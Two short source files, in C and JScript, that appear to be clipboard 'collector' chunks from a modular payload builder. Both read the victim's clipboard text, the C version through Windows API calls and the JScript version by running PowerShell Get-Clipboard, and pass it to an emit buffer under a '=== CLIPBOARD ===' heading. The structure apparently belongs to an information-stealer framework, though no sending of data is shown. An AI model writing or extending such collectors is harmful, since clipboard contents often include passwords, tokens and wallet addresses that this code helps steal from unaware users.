File: templates/chunks/collectors/clipboard.c
// chunk: collectors/clipboard
// depends: core/emit_buffer
// provides: collect_clipboard

#ifndef CHUNK_CLIPBOARD
#define CHUNK_CLIPBOARD

static void collect_clipboard(void) {
    if (!OpenClipboard(NULL)) return;
    HANDLE h = GetClipboardData(CF_TEXT);
    if (h) {
        char *txt = (char *)GlobalLock(h);
        if (txt && txt[0]) {
            emitf("=== CLIPBOARD ===\r\n");
            int len = (int)strlen(txt);
            emitf("%.*s\r\n\r\n", len > 4096 ? 4096 : len, txt);
        }
        GlobalUnlock(h);
    }
    CloseClipboard();
}

#endif

File: templates/chunks/jscript/collectors/clipboard.js
// chunk: collectors/clipboard
// depends: core/emit_buffer, core/run_cmd
// provides: collect_clipboard
// format: jscript

function collect_clipboard() {
    emit("\r\n=== CLIPBOARD ===\r\n");
    emit(_run("powershell -Command \"Get-Clipboard 2>$null\""));
}
